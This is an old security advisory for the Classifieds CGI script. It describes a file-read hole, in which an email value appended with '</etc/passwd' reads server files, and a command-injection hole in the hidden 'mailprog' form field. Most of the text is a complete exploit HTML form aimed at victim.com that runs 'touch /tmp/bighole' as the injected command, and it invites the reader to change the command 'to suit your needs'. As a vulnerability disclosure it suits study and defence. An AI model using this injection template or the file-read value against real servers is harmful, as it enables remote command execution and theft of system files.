Vulnerable Program: Classifieds (classifieds.cgi)
	 Platforms: UNIX
	    Impact: remote users can execute commands with web server privs
	  Found by: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Tuesday, December 15, 1998
		    (happy birthday to raw and benbe! :P )	

Information
-----------

Classifieds by Greg Mathews is a free cgi script for handling classified ads. 
It is available from: http://cgi.notts.net. There are multiple security holes 
in this that allow remote execution. Firstly, by setting your email address 
as something like "duke@viper.net.au</etc/passwd" you can read files remotely 
off the server. 

Also, by setting the hidden variables on a html form, a remote user can 
force arbitary commands to be executed. One example of this is modifying the 
following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be
executed.

Exploit
-------

The following form is a sample exploit. Please note that if you are trying this
out on your own machine you need to create a html file for the "category" you 
select (eg. hifi.html) and the paths have to correctly find this file, or the 
script dies out before you get to the vulnerable code. For a remote server, 
copy their path hidden fields or it will not get up to the vulnerable code
This just executes "touch /tmp/bighole". Modify it to suit your needs.. 

<HTML>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HEAD>
<META HTTP-EQUIV=Expires CONTENT="Tue, 04 Dec 1993 21:29:02 GMT">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<TITLE>notts.net Classifieds - Nottinghamshire's (UK) Community Site</TITLE>
<META NAME="Author" CONTENT="Greg Mathews - webmaster@notts.net">
<META NAME="description" CONTENT="Free Classifieds for the Community of Nottinghamshire in the UK">
<META NAME="keywords" CONTENT="nottinghamshire Nottinghamshire notts Notts nottingham Nottingham UK uk U.K. u.k. United Kingdom united kingdom Free free Classified classified business Business Web web Home home page Page homepage Homepage advertising Advertising ads adds Ads Adds">
</head>
<BODY BGCOLOR="#ffffff" TEXT="#000000" link="#008000" vlink="#800040">
<CENTER><a href="http://notts.net"><IMG SRC="http://notts.net/images/nottsnet.gif" BORDER=0 alt="notts.net - Nottinghamshire Community Site" width=400 height=63></a></CENTER>
<font face="COMIC SANS MS,ARIAL">
<BLOCKQUOTE><H1><font color="#004080">notts.net</font> Classifieds -</H1><P>
Welcome to the Classifieds.  Got something you want to sell?  Looking to buy?  This is the place!  And you can place your classified ad for FREE! for two weeks.<p>
<hr>
<h2>Instructions for Using the Classifieds</h2><p>
<b>Submitting Your Classified Ad</b><br>
To submit your classified ad, fill out the form below completely and select "Post a New Ad".  If the form is not filled out completely, your ad will not be added to the system.  When done, select "Postad" located at the bottom of the page.<p>

<b>Viewing Classified Ads</b><br>
To view classified ads, select one of the departments available to view.
Then, select "ViewAds" at the bottom of the Table.
<p>

<b>Removing your Classified Ads</b><br>
If you have posted a classified ad and wish to remove it at any time, i.e.if your product has been sold then please <a href="remove.html">Click Here</a>
<p><hr>


<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="duke@viper.net.au">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?</b><p>

<center><table width=80%>
<tr><td><input type=radio name="Department" value="accom"> Accommodation</td><td><input type=radio name="Department" value="animals"> Animals</td></tr>
<tr><td><input type=radio name="Department" value="children"> Children</td><td><input type=radio name="Department" value="clothing"> Clothing</td></tr>
<tr><td><input type=radio name="Department" value="computers"> Computers</td><td><input type=radio name="Department" value="computersoftware"> Computer Software</td></tr>
<tr><td><input type=radio name="Department" value="furniture"> Furniture</td><td><input type=radio name="Department" value="hifi"> Hi-Fi</td></tr>
<tr><td><input type=radio name="Department" value="kitchen"> Kitchen Appliences</td><td><input type=radio name="Department" value="leisure"> Leisure </td></tr>
<tr><td><input type=radio name="Department" value="misc"> Misc.</td><td><input type=radio name="Department" value="baby"> Mother & Baby</td></tr>
<tr><td><input type=radio name="Department" value="cars"> Motor</td><td><input type=radio name="Department" value="tv"> TV & Video</td></tr>
</table><P><input type=submit name="Selection" value="ViewAds"></center><p>

<pre>               <b>Your Name:</b> <input type=text name="RealName" size=30 maxlength=45>
          <b>E-Mail Address:</b> <input type=text name="E-MailAddress" size=30 maxlength=60>
                 <b>Address:</b> <input type=text name="Address1" size=30 maxlength=60>
<b>Address2 (if applicable):</b> <input type=text name="Address2" size=30 maxlength=60>
                    <b>City:</b> <input type=text name="City" size=30 maxlength=60>
           <b>State/Country:</b> <input type=text name="State" size=10>
                <b>Zip Code:</b> <input type=text name="ZipCode" size=10 maxlength=10>
           <b>Daytime Phone:</b> <input type=text name="Phone" size=14 maxlength=18></pre><br>

<p>

<b>What is the subject of your ad? </b><input type=text name="AdSubject" size=40 maxlength=40><p>
<b>If your desired department was not listed above, what department would you prefer more?</b><br>
<input type=text name="DesiredDepartment" size=40 maxlength=40><p>
<b>Please enter a brief description below (No HTML, Use && to start new paragraph.):</b><br>
<textarea name="Description" cols=65 rows=5 wrap=virtual></textarea><p>
<p>
<b>Enter URL of page to link to (Optional): </b><br>
<input type=text name="Linkurl" size=60 value="http://"><p>
<b>Enter title of page to link to (Optional): </b><br>
<input type=text name="Linktitle" size=60><p>
<input type=submit name="Selection" value="PostAd">
<input type=reset value="Clear All"><p>
</form>


</BLOCKQUOTE></body></HTML>


